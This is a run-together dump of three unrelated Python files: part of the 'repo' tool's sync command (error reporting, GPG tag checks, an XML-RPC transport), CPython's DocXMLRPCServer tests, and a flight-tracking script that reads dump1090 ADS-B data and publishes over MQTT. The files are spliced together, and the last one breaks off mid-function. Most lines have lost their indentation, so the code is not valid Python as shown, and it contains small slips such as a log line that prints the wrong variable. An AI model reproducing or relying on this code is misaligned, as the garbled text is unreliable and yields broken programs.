# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
err_network_sync = True
if opt.fail_fast:
print('\nerror: Exited sync due to fetch errors.\n'
'Local checkouts *not* updated. Resolve network issues & '
'retry.\n'
'`repo sync -l` will update some local checkouts.',
file=sys.stderr)
sys.exit(1)
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
err_event.set()
err_update_projects = True
if opt.fail_fast:
print('\nerror: Local checkouts *not* updated.', file=sys.stderr)
sys.exit(1)
err_results = []
# NB: We don't exit here because this is the last step.
err_checkout = not self._Checkout(all_projects, opt, err_results)
if err_checkout:
err_event.set()
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
print('\nerror: Unable to fully sync the tree.', file=sys.stderr)
if err_network_sync:
print('error: Downloading network changes failed.', file=sys.stderr)
if err_update_projects:
print('error: Updating local project lists failed.', file=sys.stderr)
if err_checkout:
print('error: Checking out local projects failed.', file=sys.stderr)
if err_results:
print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr)
print('Try re-running with "-j1 --fail-fast" to exit at the first error.',
file=sys.stderr)
sys.exit(1)
if not opt.quiet:
print('repo sync has finished successfully.')
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, repo_verify=True, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if not repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo.',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir
env['GNUPGHOME'] = gpg_dir
cmd = [GIT, 'tag', '-v', cur]
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=env, check=False)
if result.returncode:
print(file=sys.stderr)
print(result.stdout, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
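# Exponentially weighted moving average: recent fetch times are weighted by
# _ALPHA, so the per-project estimate adapts as repositories change size.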
a = self._ALPHA
self._times[name] = (a * t) + ((1 - a) * old)
def _Load(self):
if self._times is None:
try:
with open(self._path) as f:
self._times = json.load(f)
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
with open(self._path, 'w') as f:
json.dump(self._times, f, indent=2)
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib2
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport, the real url
# is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile(mode='w')
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy})
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
            while True:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
|
test_docxmlrpc.py | from xmlrpc.server import DocXMLRPCServer
import http.client
import sys
from test import support
threading = support.import_module('threading')
import time
import socket
import unittest
PORT = None
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
self.client.request("GET", "/")
self.client.getresponse()
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"This is an XML-RPC server's documentation, but the server "
"can be used by POSTing to /RPC2. Try self.add, too.")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
def annotation(x: int):
""" Use function annotations. """
return x
class ClassWithAnnotation:
def method_annotation(self, x: bytes):
return x.decode()
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
serv.register_function(annotation)
serv.register_instance(ClassWithAnnotation())
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
self._threads = support.threading_setup()
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
        deadline = time.monotonic() + 10.0
        while PORT is None:
            time.sleep(0.010)
            if time.monotonic() > deadline:
                self.fail("server thread did not set PORT within 10 seconds")
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
support.threading_cleanup(*self._threads)
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server raises an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn((b'<dl><dt><a name="-<lambda>"><strong>'
b'<lambda></strong></a>(x, y)</dt></dl>'),
response.read())
    @make_request_and_skipIf(sys.flags.optimize >= 2,
                             "Docstrings are omitted with -OO and above")
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to
PEPS and RFCs with links, and that it linkifies text starting with
http or ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd>'
b'<tt>Add two instances together. This '
b'follows <a href="http://www.python.org/dev/peps/pep-0008/">'
b'PEP008</a>, but has nothing<br>\nto do '
b'with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">'
b'RFC1952</a>. Case should matter: pEp008 '
b'and rFC1952. Things<br>\nthat start '
b'with http and ftp should be '
b'auto-linked, too:<br>\n<a href="http://google.com">'
b'http://google.com</a>.</tt></dd></dl>'), response)
    @make_request_and_skipIf(sys.flags.optimize >= 2,
                             "Docstrings are omitted with -OO and above")
def test_system_methods(self):
"""Test the presence of three consecutive system.* methods.
This also tests their use of parameter type recognition and the
systems related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp'
b'</strong></a>(method_name)</dt><dd><tt><a href="#-system.method'
b'Help">system.methodHelp</a>(\'add\') => "Adds '
b'two integers together"<br>\n <br>\nReturns a'
b' string containing documentation for '
b'the specified method.</tt></dd></dl>\n<dl><dt><a name'
b'="-system.methodSignature"><strong>system.methodSignature</strong>'
b'</a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">'
b'system.methodSignature</a>(\'add\') => [double, '
b'int, int]<br>\n <br>\nReturns a list '
b'describing the signature of the method.'
b' In the<br>\nabove example, the add '
b'method takes two integers as arguments'
b'<br>\nand returns a double result.<br>\n '
b'<br>\nThis server does NOT support system'
b'.methodSignature.</tt></dd></dl>'), response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn(b"""Try self.<strong>add</strong>, too.""",
response.read())
def test_annotations(self):
""" Test that annotations works as expected """
self.client.request("GET", "/")
response = self.client.getresponse()
docstring = (b'' if sys.flags.optimize >= 2 else
b'<dd><tt>Use function annotations.</tt></dd>')
self.assertIn(
(b'<dl><dt><a name="-annotation"><strong>annotation</strong></a>'
b'(x: int)</dt>' + docstring + b'</dl>\n'
b'<dl><dt><a name="-method_annotation"><strong>'
b'method_annotation</strong></a>(x: bytes)</dt></dl>'),
response.read())
if __name__ == '__main__':
unittest.main()
|
flighttracker.py | #!/usr/bin/env python3
#
# Copyright (c) 2020 Johan Kanflo (github.com/kanflo)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from typing import *
import socket, select
import argparse
import threading
import json
import sys
import os
import logging
import coloredlogs
import calendar
from datetime import datetime, timedelta
import signal
import random
import time
import re
import errno
import sbs1
import utils
import paho.mqtt.client as mqtt
from json.decoder import JSONDecodeError
import pandas as pd
from queue import Queue
from flask import Flask
from flask import render_template
ID = str(random.randint(1,100001))
# Clean out observations this often
OBSERVATION_CLEAN_INTERVAL = 10
# Socket read timeout
DUMP1090_SOCKET_TIMEOUT = 60
q = Queue()  # Good writeup of how to pass messages from MQTT into classes, here: http://www.steves-internet-guide.com/mqtt-python-callbacks/
args = None
camera_latitude = None
plane_topic = None  # the on_message callback lives outside the class and needs the plane topic, so it is a module-level global
config_topic = "skyscan/config/json"
camera_longitude = None
camera_altitude = None
camera_lead = None
min_elevation = None
min_altitude = None
max_altitude = None
min_distance = None
max_distance = None
aircraft_pinned = None
tracker = None
app = Flask(__name__)
# http://stackoverflow.com/questions/1165352/fast-comparison-between-two-python-dictionary
class DictDiffer(object):
"""
Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current, self.set_past = set(current_dict.keys()), set(past_dict.keys())
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect if self.past_dict[o] == self.current_dict[o])
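# A quick illustration of DictDiffer semantics (sketch):
#   d = DictDiffer({'alt': 100, 'spd': 250}, {'alt': 90, 'spd': 250})
#   d.changed()   -> {'alt'}
#   d.unchanged() -> {'spd'}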
class Observation(object):
"""
This class keeps track of the observed flights around us.
"""
__icao24 = None
__loggedDate = None
__callsign = None
__altitude = None
__altitudeTime = None
__groundSpeed = None
__track = None
__lat = None
__lon = None
__latLonTime = None
__verticalRate = None
__operator = None
__registration = None
__type = None
__manufacturer = None
__model = None
__updated = None
__distance = None
__bearing = None
__elevation = None
__planedb_nagged = False # Used in case the icao24 is unknown and we only want to log this once
    __onGround = None
    __route = None  # never populated from SBS1 data; declared so getRoute() cannot raise AttributeError
def __init__(self, sbs1msg):
        self.__icao24 = sbs1msg["icao24"].lower()  # let's always keep icao24 in lower case
self.__loggedDate = datetime.utcnow() # sbs1msg["loggedDate"]
self.__callsign = sbs1msg["callsign"]
self.__altitude = sbs1msg["altitude"]
self.__altitudeTime = datetime.utcnow()
self.__groundSpeed = sbs1msg["groundSpeed"]
self.__track = sbs1msg["track"]
self.__lat = sbs1msg["lat"]
self.__lon = sbs1msg["lon"]
self.__latLonTime = datetime.utcnow()
self.__verticalRate = sbs1msg["verticalRate"]
self.__onGround = sbs1msg["onGround"]
self.__operator = None
self.__registration = None
self.__type = None
self.__model = None
self.__manufacturer = None
self.__updated = True
plane = planes.loc[planes['icao24'] == self.__icao24]
        if plane.size == 27:  # the aircraft database CSV has 27 columns, so a single matched row has size 27
logging.info("{}\t[ADDED]\t\t{} {} {} {} {}".format(self.__icao24.lower(), plane["registration"].values[0],plane["manufacturername"].values[0], plane["model"].values[0], plane["operator"].values[0], plane["owner"].values[0]))
self.__registration = plane['registration'].values[0]
self.__type = str(plane['manufacturername'].values[0]) + " " + str(plane['model'].values[0])
self.__manufacturer = plane['manufacturername'].values[0]
self.__model = plane['model'].values[0]
self.__operator = plane['operator'].values[0]
else:
if not self.__planedb_nagged:
self.__planedb_nagged = True
logging.error("%s\t Not found in the database" % (self.__icao24))
def update(self, sbs1msg):
""" Updates information about a plane from an SBS1 message """
oldData = dict(self.__dict__) # save existing data to determine if anything has changed
self.__loggedDate = datetime.utcnow()
if sbs1msg["icao24"]:
self.__icao24 = sbs1msg["icao24"].lower() # Let's always keep icao24 in lower case
if sbs1msg["callsign"] and self.__callsign != sbs1msg["callsign"]:
self.__callsign = sbs1msg["callsign"].rstrip()
if sbs1msg["altitude"] is not None:
if self.__altitude != sbs1msg["altitude"]:
self.__altitude = sbs1msg["altitude"]
self.__altitudeTime = sbs1msg["generatedDate"]
if sbs1msg["groundSpeed"] is not None:
self.__groundSpeed = sbs1msg["groundSpeed"]
if sbs1msg["track"] is not None:
self.__track = sbs1msg["track"]
if sbs1msg["onGround"] is not None:
self.__onGround = sbs1msg["onGround"]
if sbs1msg["lat"] is not None:
self.__lat = sbs1msg["lat"]
self.__latLonTime = sbs1msg["generatedDate"]
if sbs1msg["lon"] is not None:
self.__lon = sbs1msg["lon"]
self.__latLonTime = sbs1msg["generatedDate"]
if sbs1msg["verticalRate"] is not None:
self.__verticalRate = sbs1msg["verticalRate"]
if not self.__verticalRate:
self.__verticalRate = 0
if self.__lat and self.__lon and self.__altitude and self.__track:
# Calculates the distance from the cameras location to the airplane. The output is in METERS!
distance3d = utils.coordinate_distance_3d(camera_latitude, camera_longitude, camera_altitude, self.__lat, self.__lon, self.__altitude)
distance2d = utils.coordinate_distance(camera_latitude, camera_longitude, self.__lat, self.__lon )
self.__distance = distance3d
self.__bearing = utils.bearingFromCoordinate(cameraPosition=[camera_latitude, camera_longitude], airplanePosition=[self.__lat, self.__lon], heading=self.__track)
self.__elevation = utils.elevation(distance2d, cameraAltitude=camera_altitude, airplaneAltitude=self.__altitude) # Distance and Altitude are both in meters
# Check if observation was updated
newData = dict(self.__dict__)
#del oldData["_Observation__loggedDate"]
#del newData["_Observation__loggedDate"]
d = DictDiffer(oldData, newData)
self.__updated = len(d.changed()) > 0
def getIcao24(self) -> str:
return self.__icao24
def getLat(self) -> float:
return self.__lat
def getLon(self) -> float:
return self.__lon
def isUpdated(self) -> bool:
return self.__updated
def getElevation(self) -> int:
return self.__elevation
def getDistance(self) -> int:
return self.__distance
def getLoggedDate(self) -> datetime:
return self.__loggedDate
def getLatLonTime(self) -> datetime:
return self.__latLonTime
def getAltitudeTime(self) -> datetime:
return self.__altitudeTime
def getGroundSpeed(self) -> float:
return self.__groundSpeed
def getTrack(self) -> float:
return self.__track
def getOnGround(self) -> bool:
return self.__onGround
def getAltitude(self) -> float:
if self.getOnGround():
self.__altitude = camera_altitude
return self.__altitude
def getType(self) -> str:
return self.__type
def getManufacturer(self) -> str:
return self.__manufacturer
def getModel(self) -> str:
return self.__model
def getRegistration(self) -> str:
return self.__registration
def getOperator(self) -> str:
return self.__operator
def getRoute(self) -> str:
return self.__route
def getVerticalRate(self) -> float:
return self.__verticalRate
def isPresentable(self) -> bool:
        return bool(self.__altitude and self.__groundSpeed and self.__track and self.__lat and self.__lon and self.__distance)
def dump(self):
"""Dump this observation on the console
"""
now = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
logging.debug("> %s %s %-7s - trk:%3d spd:%3d alt:%5d (%5d) %.4f, %.4f" % (now, self.__icao24, self.__callsign, self.__track, self.__groundSpeed, self.__altitude, self.__verticalRate, self.__lat, self.__lon))
def json(self) -> str:
"""Return JSON representation of this observation
Arguments:
bearing {float} -- bearing to observation in degrees
distance {int} -- distance to observation in meters
Returns:
str -- JSON string
"""
if self.__callsign is None:
callsign = "None"
else:
callsign = "%s" % self.__callsign
planeDict = {"verticalRate": self.__verticalRate, "time": time.time(), "lat": self.__lat, "lon": self.__lon, "altitude": self.__altitude, "groundSpeed": self.__groundSpeed, "icao24": self.__icao24, "registration": self.__registration, "track": self.__track, "operator": self.__operator, "loggedDate": self.__loggedDate, "type": self.__type, "latLonTime": self.__latLonTime, "altitudeTime": self.__altitudeTime, "manufacturer": self.__manufacturer, "model": self.__model, "callsign": callsign, "bearing": self.__bearing, "distance": self.__distance, "elevation": self.__elevation}
jsonString = json.dumps(planeDict, indent=4, sort_keys=True, default=str)
return jsonString
    def dict(self):
        d = dict(self.__dict__)
        if d["_Observation__verticalRate"] is None:
            d["_Observation__verticalRate"] = 0
        # drop transient fields if present (the keys are name-mangled)
        for key in ("_Observation__lastAlt", "_Observation__lastLat", "_Observation__lastLon"):
            if key in d:
                del d[key]
        return d
def update_config(config):
""" Adjust configuration values based on MQTT config messages that come in """
    global camera_lead
    global min_elevation
    global min_distance
    global min_altitude
    global max_altitude
    global max_distance
    global aircraft_pinned
if "cameraLead" in config:
camera_lead = float(config["cameraLead"])
logging.info("Setting Camera Lead to: {}".format(camera_lead))
if "minElevation" in config:
min_elevation = int(config["minElevation"])
logging.info("Setting Min. Elevation to: {}".format(min_elevation))
if "minDistance" in config:
min_distance = int(config["minDistance"])
logging.info("Setting Min. Distance to: {}".format(min_distance))
if "minAltitude" in config:
min_altitude = int(config["minAltitude"])
logging.info("Setting Min. Altitude to: {}".format(min_altitude))
if "maxAltitude" in config:
max_altitude = int(config["maxAltitude"])
logging.info("Setting Max Altitude to: {}".format(max_altitude))
if "maxDistance" in config:
max_distance = int(config["maxDistance"])
logging.info("Setting Max Distance to: {}".format(min_elevation))
if "aircraftPinned" in config:
aircraft_pinned = config["aircraftPinned"].lower()
logging.info("Pinning Aircraft to: {}".format(aircraft_pinned))
def on_message(client, userdata, message):
""" MQTT Client callback for new messages """
global camera_altitude
global camera_latitude
global camera_longitude
    command = str(message.payload.decode("utf-8"))
    # Assumes you will only be getting JSON on your subscribed messages
    try:
        update = json.loads(command)
    except JSONDecodeError as e:
        logging.critical("onMessage - JSONDecode Error: {} ".format(e))
        return
    except TypeError as e:
        logging.critical("onMessage - Type Error: {} ".format(e))
        return
    except ValueError as e:
        logging.critical("onMessage - Value Error: {} ".format(e))
        return
    except Exception:
        # without these returns, `update` would be unbound below
        logging.critical("onMessage - Caught an unexpected error", exc_info=True)
        return
if message.topic == "skyscan/egi":
#logging.info(update)
camera_longitude = float(update["long"])
camera_latitude = float(update["lat"])
camera_altitude = float(update["alt"])
elif message.topic == config_topic:
update_config(update)
logging.info("Config Message: {}".format(update))
else:
logging.info("Topic not processed: " + message.topic)
class FlightTracker(object):
__mqtt_broker: str = ""
__mqtt_port: int = 0
__plane_topic: str = None
__flight_topic: str = None
__client = None
__observations: Dict[str, str] = {}
__tracking_icao24: str = None
__tracking_distance: int = 999999999
__next_clean: datetime = None
__has_nagged: bool = False
__dump1090_host: str = ""
__dump1090_port: int = 0
__dump1090_sock: socket.socket = None
def __init__(self, dump1090_host: str, mqtt_broker: str, plane_topic: str, flight_topic: str, dump1090_port: int = 30003, mqtt_port: int = 1883, ):
"""Initialize the flight tracker
Arguments:
dump1090_host {str} -- Name or IP of dump1090 host
mqtt_broker {str} -- Name or IP of dump1090 MQTT broker
latitude {float} -- Latitude of receiver
longitude {float} -- Longitude of receiver
plane_topic {str} -- MQTT topic for plane reports
flight_topic {str} -- MQTT topic for current tracking report
Keyword Arguments:
dump1090_port {int} -- Override the dump1090 raw port (default: {30003})
mqtt_port {int} -- Override the MQTT default port (default: {1883})
"""
self.__dump1090_host = dump1090_host
self.__dump1090_port = dump1090_port
self.__mqtt_broker = mqtt_broker
self.__mqtt_port = mqtt_port
self.__sock = None
self.__observations = {}
self.__next_clean = datetime.utcnow() + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL)
self.__plane_topic = plane_topic
self.__flight_topic = flight_topic
def __getObservationJson(self, observation):
(lat, lon, alt) = utils.calc_travel_3d(observation.getLat(), observation.getLon(), observation.getAltitude(), observation.getLatLonTime(), observation.getAltitudeTime(), observation.getGroundSpeed(), observation.getTrack(), observation.getVerticalRate(), camera_lead)
distance3d = utils.coordinate_distance_3d(camera_latitude, camera_longitude, camera_altitude, lat, lon, alt)
#(latorig, lonorig) = utils.calc_travel(observation.getLat(), observation.getLon(), observation.getLatLonTime(), observation.getGroundSpeed(), observation.getTrack(), camera_lead)
distance2d = utils.coordinate_distance(camera_latitude, camera_longitude, lat, lon)
bearing = utils.bearingFromCoordinate( cameraPosition=[camera_latitude, camera_longitude], airplanePosition=[lat, lon], heading=observation.getTrack())
elevation = utils.elevation(distance2d, cameraAltitude=camera_altitude, airplaneAltitude=alt)
cameraTilt = elevation
cameraPan = utils.cameraPanFromCoordinate(cameraPosition=[camera_latitude, camera_longitude], airplanePosition=[lat, lon])
#elevationorig = utils.elevation(distance2d, observation.getAltitude(), camera_altitude)
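        # Note: the predicted position, bearing, pan and tilt computed above are
        # currently unused; the raw observation JSON is returned as-is below.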
return observation.json()
def __publish_thread(self):
"""
MQTT publish closest observation every second, more often if the plane is closer
"""
timeHeartbeat = 0
notTrackingJson = "{}"
while True:
            # Check whether it is time to publish a heartbeat message
if timeHeartbeat < time.mktime(time.gmtime()):
timeHeartbeat = time.mktime(time.gmtime()) + 10
self.__client.publish("skyscan/heartbeat", "skyscan-tracker-" +ID+" Heartbeat", 0, False)
# if we are not tracking anything, goto sleep for 1 second
if not self.__tracking_icao24:
retain = False
self.__client.publish(self.__flight_topic, notTrackingJson, 0, retain)
time.sleep(1)
else:
# Check to see if the currently tracked airplane is in the observations
                if self.__tracking_icao24 not in self.__observations:
self.__tracking_icao24 = None
continue
cur = self.__observations[self.__tracking_icao24]
if cur is None:
continue
retain = False
self.__client.publish(self.__flight_topic, cur.json(), 0, retain)
if self.__tracking_distance < 3000:
time.sleep(0.25)
elif self.__tracking_distance < 6000:
time.sleep(0.5)
else:
time.sleep(1)
def __whyTrackable(self, observation) -> str:
""" Returns a string explaining why a Plane can or cannot be tracked """
reason = ""
        if observation.getAltitude() is None or observation.getGroundSpeed() is None or observation.getTrack() is None or observation.getLat() is None or observation.getLon() is None:
            reason = "Loc: ⛔️"
        else:
            reason = "Loc: ✅"
        if observation.getOnGround():
            reason = reason + "\tGrnd: ⛔️"
        else:
            reason = reason + "\tGrnd: ✅"
        if max_altitude is not None and observation.getAltitude() is not None and observation.getAltitude() > max_altitude:
            reason = reason + "\tMax Alt: ⛔️"
        else:
            reason = reason + "\tMax Alt: ✅"
        if min_altitude is not None and observation.getAltitude() is not None and observation.getAltitude() < min_altitude:
            reason = reason + "\tMin Alt: ⛔️"
        else:
            reason = reason + "\tMin Alt: ✅"
        if observation.getDistance() is None or observation.getElevation() is None:
            # this method returns a string, so report the failure rather than returning a bool
            return reason + "\tDist/Elev: ⛔️"
        if min_distance is not None and observation.getDistance() < min_distance:
            reason = reason + "\tMin Dist: ⛔️"
        else:
            reason = reason + "\tMin Dist: ✅"
        if max_distance is not None and observation.getDistance() > max_distance:
            reason = reason + "\tMax Dist: ⛔️"
        else:
            reason = reason + "\tMax Dist: ✅"
        if observation.getElevation() < min_elevation:
            reason = reason + "\tMin Elv: ⛔️"
        else:
            reason = reason + "\tMin Elv: ✅"
        return reason
def __isTrackable(self, observation) -> bool:
""" Does this observation meet all of the requirements to be tracked """
        if observation.getAltitude() is None or observation.getGroundSpeed() is None or observation.getTrack() is None or observation.getLat() is None or observation.getLon() is None:
            return False
        if observation.getOnGround():
            return False
        if max_altitude is not None and observation.getAltitude() > max_altitude:
            return False
        if min_altitude is not None and observation.getAltitude() < min_altitude:
            return False
        if observation.getDistance() is None or observation.getElevation() is None:
            return False
        if min_distance is not None and observation.getDistance() < min_distance:
            return False
        if max_distance is not None and observation.getDistance() > max_distance:
            return False
        if observation.getElevation() < min_elevation:
            return False
return True
def __updateTrackingDistance(self):
"""Update distance to aircraft being tracked
"""
cur = self.__observations[self.__tracking_icao24]
if cur.getAltitude():
self.__tracking_distance = utils.coordinate_distance_3d(camera_latitude, camera_longitude, camera_altitude, cur.getLat(), cur.getLon(), cur.getAltitude())
def __observationKey(self,obs):
return int(obs["_Observation__distance"])
def getObservations(self):
items=[]
for icao24 in self.__observations:
if self.__observations[icao24].isPresentable():
items.append(self.__observations[icao24].dict())
items.sort(key=self.__observationKey)
return items
def getTracking(self):
return self.__tracking_icao24
def getTrackingObservation(self):
return self.__getObservationJson(self.__observations[self.__tracking_icao24])
def dump1090Connect(self) -> bool:
"""If not connected, connect to the dump1090 host
Returns:
bool -- True if we are connected
"""
if self.__dump1090_sock == None:
try:
if not self.__has_nagged:
logging.info("Connecting to dump1090")
self.__dump1090_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__dump1090_sock.connect((self.__dump1090_host, self.__dump1090_port))
logging.info("ADSB connected")
self.__dump1090_sock.settimeout(DUMP1090_SOCKET_TIMEOUT)
self.__has_nagged = False
return True
except socket.error as e:
if not self.__has_nagged:
logging.critical("Failed to connect to ADSB receiver on %s:%s, retrying : %s" % (self.__dump1090_host, self.__dump1090_port, e))
self.__has_nagged = True
self.__dump1090_sock = None
time.sleep(5)
return False
else:
return True
def dump1090Close(self):
"""Close connection to dump1090 host.
"""
try:
self.__dump1090_sock.close()
except socket.error:
pass
self.__dump1090_sock = None
self.__has_nagged = False
logging.critical("Closing dump1090 connection")
def dump1090Read(self) -> str:
"""Read a line from the dump1090 host. If the host went down, close the socket and return None
Returns:
str -- An SBS1 message or None if disconnected or timeout
Yields:
str -- An SBS1 message or None if disconnected or timeout
"""
try:
try:
buffer = self.__dump1090_sock.recv(4096)
except ConnectionResetError:
logging.critical("Connection Reset Error")
self.dump1090Close()
return None
except socket.error:
